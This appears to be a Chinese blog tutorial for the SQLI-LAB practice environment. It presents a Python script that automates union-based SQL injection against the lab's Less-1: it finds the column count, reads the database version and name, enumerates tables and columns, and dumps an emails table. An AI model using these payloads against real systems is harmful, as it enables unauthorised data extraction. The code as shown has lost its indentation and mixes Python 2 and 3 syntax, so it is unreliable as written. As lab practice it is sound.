實驗環境: CentOS + Apache + SQLI-LAB ,可以 https://github.com/Audi-1/sqli-labs下載
利用Python 腳本實現自動化測試SQL注入,當然腳本有很多不足的地方,比如不熟悉正側(這玩意咱學都不會)、腳本不規範化等。以下爲Less-1 的腳本:
#!/usr/bin/env python
#coding=utf-8
import requests
import re,time
url = "http://192.168.32.142/sqli/Less-1/"
db_length = 0
#判定回顯位
for i in range(1,20):
payload ="?id=1' order by %d--+" %i
r = requests.get(url+payload)
if "Unknown column" in r.text:
db_length = i
print ('當前回顯位爲:%d' %db_length)
break
#判定數據庫版本號與名稱
payload = "?id=-1' UNION SELECT 1,version(),database()--+"
r = requests.get(url+payload)
if "Your Login name" and "Your Password" in r.text:
v = re.search(r'Your Login name.+\d',r.text)
db_version=str(v.group().split(':')[1])
db = re.search(r'Your Password.\w+',r.text)
db_name = str(db.group().split(':')[1])
print ('MySQL數據庫版本: %s' %db_version)
print ('數據庫名稱爲: %s' %db_name)
print "開始猜測表名......"
time.sleep(2)
payload = ("id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='%s'--+") %db_name
r = requests.get(url,payload)
if "Your Password" in r.text:
tb = ','.join(re.findall(r'Password:(.*?)</font>',r.text))
tb_name=str(tb).split(',')
for i in range(len(tb_name)):
print ('數據庫%s第%d張表名:' %(db_name,i)) + tb_name[i]
print '*'*60
for i in tb_name:
print ("開始猜測表%s下的所列名..." %i)
time.sleep(2)
payload = ("id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='%s'--+") %i
r = requests.get(url,payload)
if "Your Password" in r.text:
em = ','.join(re.findall(r'Password:(.*?)</font>',r.text))
em_name = str(em).split(',')
for k in range(len(em_name)):
print ("表%s第%d列的名稱是:" %(i,k)) + em_name[k]
print '-'*60
print '*'*60
print "開始猜測表emails下的所內容..."
time.sleep(2)
payload = "id=-1' union select 1,2,group_concat(id,'-->',email_id) from security.emails--+"
r=requests.get(url,payload)
if "Your Password" in r.text:
name = ','.join(re.findall(r"Password:(.*?)</font>",r.text))
name= str(name).split(',')
for i in range(len(name)):
print("Emails表的第%d數據是:" %i) + name[i]以下運行腳本的結果,速度還是可以的,哈哈哈
